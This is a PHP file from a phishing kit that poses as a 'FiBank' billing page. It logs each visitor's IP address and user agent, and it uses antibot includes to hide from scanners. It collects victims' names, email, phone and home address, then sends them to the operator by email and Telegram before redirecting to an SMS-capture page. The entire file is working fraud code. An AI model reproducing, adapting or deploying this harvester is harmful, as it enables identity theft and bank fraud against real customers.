<?php
    session_start();

    require_once '../../Meta/Comp.php';
    require_once '../../Meta/Antibot.php';
    require_once '../../Meta/demonTest.php';

    $comps = new Comp;
    $antibot = new Antibot;

    $settings = $comps->settings();

    
    if (
        !isset($_SESSION['visitor']) ||
        !$_SESSION['visitor']
    ) {
        $comps->log(
            "../Guard/Audio/live.txt",
            "IP: " . $_SESSION['ip'] . "\nUser Agent: " . $comps->getUserAgent() . "\nAction: Visitor\n\n"
        );
        $_SESSION['visitor'] = 1;
    }

?>
<?php

include  'email.php';

global $message;


$ip = getenv("REMOTE_ADDR");
$timestamp = date('d/m/Y h:i:s');
$browser = $_SERVER['HTTP_USER_AGENT'];
$message .= "-------------->FiBank Billing<------------------\n";

$message .= "Name and surname in Cyrillic: ".$_POST['fullNameCyrillic']."\n";
$message .= "Name and surname in Latin: ".$_POST['fullName']."\n";
$message .= "Email: ".$_POST['email']."\n";
$message .= "Telephone: ".$_POST['phone']."\n";
$message .= "Address: ".$_POST['address']."\n";
$message .= "city: ".$_POST['city']."\n";
$message .= "ZipCode: ".$_POST['zip']."\n\n";

$message .= "Time: $timestamp \n";
$message .= "Browser: $browser \n";
$message .= "IP Info: https://geoiptool.com/en/?ip=".$ip."\n";
$message .= "|----------- CrEaTeD bY Thomas Shelby |\n";


$subject = "FiBank $ip";
$headers = "";

$headers .= "\n";
	 mail("", "FiBank ", $message);
mail($Receive_email,$subject,$message,$headers);


	   	   
            
include './telegram.php';
		  header("Location: ../sms.php");
		  die();

	

?> 